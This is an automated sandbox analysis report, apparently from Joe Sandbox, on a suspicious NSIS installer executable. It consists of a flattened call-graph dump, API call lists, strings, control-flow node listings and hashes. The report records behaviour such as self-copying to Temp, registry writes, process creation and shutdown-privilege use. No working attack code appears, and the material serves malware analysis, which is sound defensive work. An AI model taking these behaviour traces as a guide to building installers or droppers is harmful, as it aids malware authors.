5376->5378 5378->5377 5379 401f1e 5380 402c5e 21 API calls 5379->5380 5381 401f24 5380->5381 5382 402c5e 21 API calls 5381->5382 5383 401f2d 5382->5383 5384 402c5e 21 API calls 5383->5384 5385 401f36 5384->5385 5386 402c5e 21 API calls 5385->5386 5387 401f3f 5386->5387 5388 401423 28 API calls 5387->5388 5389 401f46 5388->5389 5396 405969 ShellExecuteExA 5389->5396 5391 401f81 5392 40672a 5 API calls 5391->5392 5394 4027ed 5391->5394 5393 401f9b CloseHandle 5392->5393 5393->5394 5396->5391 4010 401fa0 4011 402c5e 21 API calls 4010->4011 4012 401fa6 4011->4012 4013 4053d1 28 API calls 4012->4013 4014 401fb0 4013->4014 4023 405926 CreateProcessA 4014->4023 4019 401fcb 4022 401fd7 CloseHandle 4019->4022 4031 4061eb wsprintfA 4019->4031 4020 4027ed 4022->4020 4024 401fb6 4023->4024 4025 405959 CloseHandle 4023->4025 4024->4020 4024->4022 4026 40672a WaitForSingleObject 4024->4026 4025->4024 4027 406744 4026->4027 4028 406756 GetExitCodeProcess 4027->4028 4032 4066f1 4027->4032 4028->4019 4031->4022 4033 40670e PeekMessageA 4032->4033 4034 406704 DispatchMessageA 4033->4034 4035 40671e WaitForSingleObject 4033->4035 4034->4033 4035->4027 5397 402020 5398 402c5e 21 API calls 5397->5398 5399 402027 5398->5399 5400 4066b5 5 API calls 5399->5400 5401 402036 5400->5401 5402 4020be 5401->5402 5403 40204e GlobalAlloc 5401->5403 5403->5402 5404 402062 5403->5404 5405 4066b5 5 API calls 5404->5405 5406 402069 5405->5406 5407 4066b5 5 API calls 5406->5407 5408 402073 5407->5408 5408->5402 5412 4061eb wsprintfA 5408->5412 5410 4020ae 5413 4061eb wsprintfA 5410->5413 5412->5410 5413->5402 5414 401922 5415 401959 5414->5415 5416 402c5e 21 API calls 5415->5416 5417 40195e 5416->5417 5418 405a4f 71 API calls 5417->5418 5419 401967 5418->5419 4056 4024a3 4057 402c5e 21 API calls 4056->4057 4058 4024b5 4057->4058 4059 402c5e 21 API calls 4058->4059 4060 4024bf 4059->4060 4073 402cee 4060->4073 4063 402aea 4064 4024f4 4066 402500 4064->4066 4077 402c3c 4064->4077 4065 402c5e 21 API calls 4067 4024ed lstrlenA 4065->4067 4069 402522 RegSetValueExA 4066->4069 4080 403168 4066->4080 4067->4064 4071 402538 RegCloseKey 4069->4071 4071->4063 4074 402d09 4073->4074 4100 406141 4074->4100 4078 406320 21 API calls 4077->4078 4079 402c51 4078->4079 4079->4066 4081 40317e 4080->4081 4082 4031ac 4081->4082 4109 403390 SetFilePointer 4081->4109 4104 40337a 4082->4104 4086 403313 4088 403355 4086->4088 4093 403317 4086->4093 4087 4031c9 GetTickCount 4089 4032fd 4087->4089 4096 403218 4087->4096 4090 40337a ReadFile 4088->4090 4089->4069 4090->4089 4091 40337a ReadFile 4091->4096 4092 40337a ReadFile 4092->4093 4093->4089 4093->4092 4094 405ec7 WriteFile 4093->4094 4094->4093 4095 40326e GetTickCount 4095->4096 4096->4089 4096->4091 4096->4095 4097 403293 MulDiv wsprintfA 4096->4097 4107 405ec7 WriteFile 4096->4107 4098 4053d1 28 API calls 4097->4098 4098->4096 4101 406150 4100->4101 4102 4024cf 4101->4102 4103 40615b RegCreateKeyExA 4101->4103 4102->4063 4102->4064 4102->4065 4103->4102 4110 405e98 ReadFile 4104->4110 4108 405ee5 4107->4108 4108->4096 4109->4082 4111 4031b7 4110->4111 4111->4086 4111->4087 4111->4089 5420 401d23 5421 402c3c 21 API calls 5420->5421 5422 401d29 IsWindow 5421->5422 5423 401a33 5422->5423 5424 401925 5425 402c5e 21 API calls 5424->5425 5426 40192c 5425->5426 5427 4059a3 MessageBoxIndirectA 5426->5427 5428 401935 5427->5428 5429 4027a5 5430 4027ab 5429->5430 5431 4027af FindNextFileA 5430->5431 5434 4027c1 5430->5434 5432 402800 5431->5432 5431->5434 5435 40628d lstrcpynA 5432->5435 5435->5434 5436 6e331058 5438 6e331074 5436->5438 5437 6e3310dc 5438->5437 5439 6e33154b GlobalFree 5438->5439 5440 6e331091 5438->5440 5439->5440 5441 6e33154b GlobalFree 5440->5441 5442 6e3310a1 5441->5442 5443 6e3310b1 5442->5443 5444 6e3310a8 GlobalSize 5442->5444 5445 6e3310c6 5443->5445 5446 6e3310b5 GlobalAlloc 5443->5446 5444->5443 5448 6e3310d1 GlobalFree 5445->5448 5447 6e331572 3 API calls 5446->5447 5447->5445 5448->5437 5449 401bac 5450 401bb9 5449->5450 5451 401bfd 5449->5451 5452 401c41 5450->5452 5457 401bd0 5450->5457 5453 401c01 5451->5453 5454 401c26 GlobalAlloc 5451->5454 5455 406320 21 API calls 5452->5455 5467 4023b4 5452->5467 5453->5467 5470 40628d lstrcpynA 5453->5470 5456 406320 21 API calls 5454->5456 5458 4023ae 5455->5458 5456->5452 5468 40628d lstrcpynA 5457->5468 5462 4059a3 MessageBoxIndirectA 5458->5462 5458->5467 5461 401c13 GlobalFree 5461->5467 5462->5467 5463 401bdf 5469 40628d lstrcpynA 5463->5469 5465 401bee 5471 40628d lstrcpynA 5465->5471 5468->5463 5469->5465 5470->5461 5471->5467 5472 4029af 5473 402c3c 21 API calls 5472->5473 5475 4029b5 5473->5475 5474 406320 21 API calls 5476 4027ed 5474->5476 5475->5474 5475->5476 5477 402631 5478 402c5e 21 API calls 5477->5478 5479 402638 5478->5479 5482 405e20 GetFileAttributesA CreateFileA 5479->5482 5481 402644 5482->5481 5483 404d32 GetDlgItem GetDlgItem 5484 404d88 7 API calls 5483->5484 5495 404faf 5483->5495 5485 404e30 DeleteObject 5484->5485 5486 404e24 SendMessageA 5484->5486 5487 404e3b 5485->5487 5486->5485 5489 404e72 5487->5489 5490 406320 21 API calls 5487->5490 5488 405091 5492 40513d 5488->5492 5502 4050ea SendMessageA 5488->5502 5526 404fa2 5488->5526 5491 40432d 22 API calls 5489->5491 5496 404e54 SendMessageA SendMessageA 5490->5496 5497 404e86 5491->5497 5493 405147 SendMessageA 5492->5493 5494 40514f 5492->5494 5493->5494 5504 405161 ImageList_Destroy 5494->5504 5505 405168 5494->5505 5517 405178 5494->5517 5495->5488 5500 404c80 5 API calls 5495->5500 5522 40501e 5495->5522 5496->5487 5501 40432d 22 API calls 5497->5501 5498 405083 SendMessageA 5498->5488 5499 404394 8 API calls 5503 40533e 5499->5503 5500->5522 5513 404e97 5501->5513 5507 4050ff SendMessageA 5502->5507 5502->5526 5504->5505 5508 405171 GlobalFree 5505->5508 5505->5517 5506 4052f2 5511 405304 ShowWindow GetDlgItem ShowWindow 5506->5511 5506->5526 5510 405112 5507->5510 5508->5517 5509 404f71 GetWindowLongA SetWindowLongA 5512 404f8a 5509->5512 5518 405123 SendMessageA 5510->5518 5511->5526 5514 404fa7 5512->5514 5515 404f8f ShowWindow 5512->5515 5513->5509 5516 404ee9 SendMessageA 5513->5516 5519 404f6c 5513->5519 5523 404f27 SendMessageA 5513->5523 5524 404f3b SendMessageA 5513->5524 5536 404362 SendMessageA 5514->5536 5535 404362 SendMessageA 5515->5535 5516->5513 5517->5506 5525 404d00 4 API calls 5517->5525 5530 4051b3 5517->5530 5518->5492 5519->5509 5519->5512 5522->5488 5522->5498 5523->5513 5524->5513 5525->5530 5526->5499 5527 4052bd 5528 4052c8 InvalidateRect 5527->5528 5531 4052d4 5527->5531 5528->5531 5529 4051e1 SendMessageA 5534 4051f7 5529->5534 5530->5529 5530->5534 5531->5506 5537 404c3b 5531->5537 5533 40526b SendMessageA SendMessageA 5533->5534 5534->5527 5534->5533 5535->5526 5536->5495 5540 404b76 5537->5540 5539 404c50 5539->5506 5541 404b8c 5540->5541 5542 406320 21 API calls 5541->5542 5543 404bf0 5542->5543 5544 406320 21 API calls 5543->5544 5545 404bfb 5544->5545 5546 406320 21 API calls 5545->5546 5547 404c11 lstrlenA wsprintfA SetDlgItemTextA 5546->5547 5547->5539 4470 403e33 4471 403e4b 4470->4471 4472 403fac 4470->4472 4471->4472 4473 403e57 4471->4473 4474 403fbd GetDlgItem GetDlgItem 4472->4474 4483 403ffd 4472->4483 4475 403e62 SetWindowPos 4473->4475 4476 403e75 4473->4476 4477 40432d 22 API calls 4474->4477 4475->4476 4480 403ec0 4476->4480 4481 403e7e ShowWindow 4476->4481 4482 403fe7 SetClassLongA 4477->4482 4478 404057 4479 404379 SendMessageA 4478->4479 4492 403fa7 4478->4492 4533 404069 4479->4533 4486 403ec8 DestroyWindow 4480->4486 4487 403edf 4480->4487 4484 403f99 4481->4484 4485 403e9e GetWindowLongA 4481->4485 4488 40140b 2 API calls 4482->4488 4483->4478 4489 401389 2 API calls 4483->4489 4490 404394 8 API calls 4484->4490 4485->4484 4491 403eb7 ShowWindow 4485->4491 4493 4042b6 4486->4493 4494 403ee4 SetWindowLongA 4487->4494 4495 403ef5 4487->4495 4488->4483 4496 40402f 4489->4496 4490->4492 4491->4480 4493->4492 4501 4042e7 ShowWindow 4493->4501 4494->4492 4495->4484 4500 403f01 GetDlgItem 4495->4500 4496->4478 4497 404033 SendMessageA 4496->4497 4497->4492 4498 40140b 2 API calls 4498->4533 4499 4042b8 DestroyWindow EndDialog 4499->4493 4502 403f12 SendMessageA IsWindowEnabled 4500->4502 4503 403f2f 4500->4503 4501->4492 4502->4492 4502->4503 4505 403f3c 4503->4505 4506 403f83 SendMessageA 4503->4506 4507 403f4f 4503->4507 4515 403f34 4503->4515 4504 406320 21 API calls 4504->4533 4505->4506 4505->4515 4506->4484 4509 403f57 4507->4509 4510 403f6c 4507->4510 4508 404306 SendMessageA 4511 403f6a 4508->4511 4549 40140b 4509->4549 4513 40140b 2 API calls 4510->4513 4511->4484 4516 403f73 4513->4516 4514 40432d 22 API calls 4514->4533 4515->4508 4516->4484 4516->4515 4517 40432d 22 API calls 4518 4040e4 GetDlgItem 4517->4518 4519 404101 ShowWindow KiUserCallbackDispatcher 4518->4519 4520 4040f9 4518->4520 4543 40434f KiUserCallbackDispatcher 4519->4543 4520->4519 4522 40412b EnableWindow 4527 40413f 4522->4527 4523 404144 GetSystemMenu EnableMenuItem SendMessageA 4524 404174 SendMessageA 4523->4524 4523->4527 4524->4527 4527->4523 4544 404362 SendMessageA 4527->4544 4545 403e14 4527->4545 4548 40628d lstrcpynA 4527->4548 4529 4041a3 lstrlenA 4530 406320 21 API calls 4529->4530 4531 4041b4 SetWindowTextA 4530->4531 4532 401389 2 API calls 4531->4532 4532->4533 4533->4492 4533->4498 4533->4499 4533->4504 4533->4514 4533->4517 4534 4041f8 DestroyWindow 4533->4534 4534->4493 4535 404212 CreateDialogParamA 4534->4535 4535->4493 4536 404245 4535->4536 4537 40432d 22 API calls 4536->4537 4538 404250 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4537->4538 4539 401389 2 API calls 4538->4539 4540 404296 4539->4540 4540->4492 4541 40429e ShowWindow 4540->4541 4542 404379 SendMessageA 4541->4542 4542->4493 4543->4522 4544->4527 4546 406320 21 API calls 4545->4546 4547 403e22 SetWindowTextA 4546->4547 4547->4527 4548->4529 4550 401389 2 API calls 4549->4550 4551 401420 4550->4551 4551->4515 5548 6e3318c7 5549 6e3318ea 5548->5549 5550 6e33192c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5549->5550 5551 6e33191a GlobalFree 5549->5551 5552 6e3312f6 2 API calls 5550->5552 5551->5550 5553 6e331aae GlobalFree GlobalFree 5552->5553 5554 4025b5 5555 402c9e 21 API calls 5554->5555 5556 4025bf 5555->5556 5557 402c3c 21 API calls 5556->5557 5558 4025c8 5557->5558 5559 4025e3 RegEnumKeyA 5558->5559 5560 4025ef RegEnumValueA 5558->5560 5562 4027ed 5558->5562 5561 402604 RegCloseKey 5559->5561 5560->5561 5561->5562 5564 4014b7 5565 4014bd 5564->5565 5566 401389 2 API calls 5565->5566 5567 4014c5 5566->5567 5568 6e3316c8 5569 6e3316f7 5568->5569 5570 6e331b28 18 API calls 5569->5570 5571 6e3316fe 5570->5571 5572 6e331711 5571->5572 5573 6e331705 5571->5573 5574 6e33171b 5572->5574 5575 6e331738 5572->5575 5576 6e3312f6 2 API calls 5573->5576 5577 6e331572 3 API calls 5574->5577 5578 6e331762 5575->5578 5579 6e33173e 5575->5579 5580 6e33170f 5576->5580 5582 6e331720 5577->5582 5581 6e331572 3 API calls 5578->5581 5583 6e3315e9 3 API calls 5579->5583 5581->5580 5584 6e3315e9 3 API calls 5582->5584 5585 6e331743 5583->5585 5586 6e331726 5584->5586 5587 6e3312f6 2 API calls 5585->5587 5588 6e3312f6 2 API calls 5586->5588 5589 6e331749 GlobalFree 5587->5589 5590 6e33172c GlobalFree 5588->5590 5589->5580 5591 6e33175d GlobalFree 5589->5591 5590->5580 5591->5580 5592 4047bf 5593 4047eb 5592->5593 5594 4047fc 5592->5594 5653 405987 GetDlgItemTextA 5593->5653 5596 404808 GetDlgItem 5594->5596 5598 404867 5594->5598 5597 40481c 5596->5597 5602 404830 SetWindowTextA 5597->5602 5605 405cb8 4 API calls 5597->5605 5599 40494b 5598->5599 5607 406320 21 API calls 5598->5607 5651 404af5 5598->5651 5599->5651 5655 405987 GetDlgItemTextA 5599->5655 5600 4047f6 5601 406587 5 API calls 5600->5601 5601->5594 5606 40432d 22 API calls 5602->5606 5604 404394 8 API calls 5609 404b09 5604->5609 5610 404826 5605->5610 5611 40484c 5606->5611 5612 4048db SHBrowseForFolderA 5607->5612 5608 40497b 5613 405d0d 18 API calls 5608->5613 5610->5602 5616 405c1f 3 API calls 5610->5616 5614 40432d 22 API calls 5611->5614 5612->5599 5615 4048f3 CoTaskMemFree 5612->5615 5619 404981 5613->5619 5617 40485a 5614->5617 5618 405c1f 3 API calls 5615->5618 5616->5602 5654 404362 SendMessageA 5617->5654 5621 404900 5618->5621 5656 40628d lstrcpynA 5619->5656 5624 404937 SetDlgItemTextA 5621->5624 5628 406320 21 API calls 5621->5628 5623 404860 5626 4066b5 5 API calls 5623->5626 5624->5599 5625 404998 5627 4066b5 5 API calls 5625->5627 5626->5598 5634 40499f 5627->5634 5629 40491f lstrcmpiA 5628->5629 5629->5624 5631 404930 lstrcatA 5629->5631 5630 4049db 5657 40628d lstrcpynA 5630->5657 5631->5624 5633 4049e2 5635 405cb8 4 API calls 5633->5635 5634->5630 5639 405c66 2 API calls 5634->5639 5640 404a33 5634->5640 5636 4049e8 GetDiskFreeSpaceA 5635->5636 5638 404a0c MulDiv 5636->5638 5636->5640 5638->5640 5639->5634 5641 404aa4 5640->5641 5643 404c3b 24 API calls 5640->5643 5642 404ac7 5641->5642 5644 40140b 2 API calls 5641->5644 5658 40434f KiUserCallbackDispatcher 5642->5658 5645 404a91 5643->5645 5644->5642 5647 404aa6 SetDlgItemTextA 5645->5647 5648 404a96 5645->5648 5647->5641 5649 404b76 24 API calls 5648->5649 5649->5641 5650 404ae3 5650->5651 5652 404718 SendMessageA 5650->5652 5651->5604 5652->5651 5653->5600 5654->5623 5655->5608 5656->5625 5657->5633 5658->5650

                                        Executed Functions

                                        Function 004033D8 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 430stringfilecomCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4033d8-403428 SetErrorMode GetVersionExA 1 403469 0->1 2 40342a-403444 GetVersionExA 0->2 3 403470 1->3 2->3 4 403446-403465 2->4 5 403472-40347d 3->5 6 403494-40349b 3->6 4->1 9 403490 5->9 10 40347f-40348e 5->10 7 4034a5-4034e5 6->7 8 40349d 6->8 11 4034e7-4034ef call 4066b5 7->11 12 4034f8 7->12 8->7 9->6 10->6 11->12 17 4034f1 11->17 14 4034fd-403511 call 406647 lstrlenA 12->14 19 403513-40352f call 4066b5 * 3 14->19 17->12 26 403540-4035a0 #17 OleInitialize SHGetFileInfoA call 40628d GetCommandLineA call 40628d 19->26 27 403531-403537 19->27 34 4035a2-4035a6 26->34 35 4035ab-4035be call 405c4a CharNextA 26->35 27->26 31 403539 27->31 31->26 34->35 38 40367f-403683 35->38 39 4035c3-4035c6 38->39 40 403689 38->40 41 4035c8-4035cc 39->41 42 4035ce-4035d5 39->42 43 40369d-4036b7 GetTempPathA call 4033a7 40->43 41->41 41->42 44 4035d7-4035d8 42->44 45 4035dc-4035df 42->45 52 4036b9-4036d7 GetWindowsDirectoryA lstrcatA call 4033a7 43->52 53 40370f-403727 DeleteFileA call 402f31 43->53 44->45 47 403670-40367c call 405c4a 45->47 48 4035e5-4035e9 45->48 47->38 63 40367e 47->63 50 403601-40362e 48->50 51 4035eb-4035f1 48->51 57 403640-40366e 50->57 58 403630-403636 50->58 55 4035f3-4035f5 51->55 56 4035f7 51->56 52->53 71 4036d9-403709 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4033a7 52->71 68 4037ba-4037cb call 4039bc OleUninitialize 53->68 69 40372d-403733 53->69 55->50 55->56 56->50 57->47 67 40368b-403698 call 40628d 57->67 64 403638-40363a 58->64 65 40363c 58->65 63->38 64->57 64->65 65->57 67->43 82 4037d1-4037e0 call 4059a3 ExitProcess 68->82 83 403928-40392e 68->83 72 403735-403740 call 405c4a 69->72 73 4037ab-4037b2 call 403a96 69->73 71->53 71->68 86 403742-40376b 72->86 87 403776-40377f 72->87 80 4037b7 73->80 80->68 84 403930-403945 GetCurrentProcess OpenProcessToken 83->84 85 4039a6-4039ae 83->85 91 403976-403984 call 4066b5 84->91 92 403947-403970 LookupPrivilegeValueA AdjustTokenPrivileges 84->92 89 4039b0 85->89 90 4039b3-4039b6 ExitProcess 85->90 93 40376d-40376f 86->93 94 403781-40378f call 405d0d 87->94 95 4037e6-40380a call 40590e lstrlenA call 40628d 87->95 89->90 104 403992-40399d ExitWindowsEx 91->104 105 403986-403990 91->105 92->91 93->87 98 403771-403774 93->98 94->68 106 403791-4037a7 call 40628d * 2 94->106 114 40381b-403830 95->114 115 40380c-403816 call 40628d 95->115 98->87 98->93 104->85 108 40399f-4039a1 call 40140b 104->108 105->104 105->108 106->73 108->85 117 403835 114->117 115->114 120 403839-403865 wsprintfA call 406320 117->120 123 403867-40386c call 405897 120->123 124 40386e call 4058f1 120->124 128 403873-403875 123->128 124->128 129 403877-403881 GetFileAttributesA 128->129 130 4038af-4038ce SetCurrentDirectoryA call 406066 CopyFileA 128->130 132 4038a0-4038a8 129->132 133 403883-40388c DeleteFileA 129->133 130->68 137 4038d4-4038f5 call 406066 call 406320 call 405926 130->137 132->117 134 4038aa 132->134 133->132 136 40388e-40389e call 405a4f 133->136 134->68 136->120 136->132 146 4038f7-4038ff 137->146 147 403918-403923 CloseHandle 137->147 146->68 148 403905-40390d call 406620 146->148 147->68 148->120 151 403913 148->151 151->68
                                        APIs
                                        • SetErrorMode.KERNELBASE(00008001), ref: 004033FB
                                        • GetVersionExA.KERNEL32(?), ref: 00403424
                                        • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                        • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                        • OleInitialize.OLE32(00000000), ref: 00403548
                                        • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                        • GetCommandLineA.KERNEL32(0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",00000020,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
                                        • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403714
                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                        • ExitProcess.KERNEL32 ref: 004037E0
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                        • wsprintfA.USER32 ref: 00403846
                                        • GetFileAttributesA.KERNEL32(888,C:\Users\user\AppData\Local\Temp\,888,?,0000000C), ref: 00403878
                                        • DeleteFileA.KERNEL32(888), ref: 00403884
                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,888,?,0000000C), ref: 004038B0
                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,888,00000001), ref: 004038C6
                                        • CloseHandle.KERNEL32(00000000,00431800,00431800,?,888,00000000), ref: 00403919
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                        • ExitProcess.KERNEL32 ref: 004039B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                        • String ID: "$"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"$1033$888$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate$C:\Users\user\Desktop$C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu%X.tmp
                                        • API String ID: 2956269667-4036010298
                                        • Opcode ID: 5cdaee19dc3e25094bd540d3cee5e8eae226bbf285dc81e201763af22fa04eb7
                                        • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                        • Opcode Fuzzy Hash: 5cdaee19dc3e25094bd540d3cee5e8eae226bbf285dc81e201763af22fa04eb7
                                        • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E
                                        Function 0040550F Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 259 40550f-40552b 260 405531-4055f8 GetDlgItem * 3 call 404362 call 404c53 GetClientRect GetSystemMetrics SendMessageA * 2 259->260 261 4056ba-4056c0 259->261 279 405616-405619 260->279 280 4055fa-405614 SendMessageA * 2 260->280 262 4056c2-4056e4 GetDlgItem CreateThread CloseHandle 261->262 263 4056ea-4056f6 261->263 262->263 265 405718-40571e 263->265 266 4056f8-4056fe 263->266 271 405720-405726 265->271 272 405773-405776 265->272 269 405700-405713 ShowWindow * 2 call 404362 266->269 270 405739-405740 call 404394 266->270 269->265 283 405745-405749 270->283 276 405728-405734 call 404306 271->276 277 40574c-40575c ShowWindow 271->277 272->270 274 405778-40577e 272->274 274->270 281 405780-405793 SendMessageA 274->281 276->270 284 40576c-40576e call 404306 277->284 285 40575e-405767 call 4053d1 277->285 287 405629-405640 call 40432d 279->287 288 40561b-405627 SendMessageA 279->288 280->279 289 405890-405892 281->289 290 405799-4057c5 CreatePopupMenu call 406320 AppendMenuA 281->290 284->272 285->284 298 405642-405656 ShowWindow 287->298 299 405676-405697 GetDlgItem SendMessageA 287->299 288->287 289->283 296 4057c7-4057d7 GetWindowRect 290->296 297 4057da-4057f0 TrackPopupMenu 290->297 296->297 297->289 300 4057f6-405810 297->300 301 405665 298->301 302 405658-405663 ShowWindow 298->302 299->289 303 40569d-4056b5 SendMessageA * 2 299->303 304 405815-405830 SendMessageA 300->304 305 40566b-405671 call 404362 301->305 302->305 303->289 304->304 306 405832-405852 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 304->306 305->299 308 405854-405874 SendMessageA 306->308 308->308 309 405876-40588a GlobalUnlock SetClipboardData CloseClipboard 308->309 309->289
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                        • GetClientRect.USER32(?,?), ref: 004055BA
                                        • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                        • ShowWindow.USER32(?,00000008), ref: 0040565D
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                        • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                        • CloseHandle.KERNELBASE(00000000), ref: 004056E4
                                        • ShowWindow.USER32(00000000), ref: 00405707
                                        • ShowWindow.USER32(?,00000008), ref: 0040570E
                                        • ShowWindow.USER32(00000008), ref: 00405754
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                        • CreatePopupMenu.USER32 ref: 00405799
                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                        • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                        • OpenClipboard.USER32(00000000), ref: 00405833
                                        • EmptyClipboard.USER32 ref: 00405839
                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                        • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                        • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                        • CloseClipboard.USER32 ref: 0040588A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
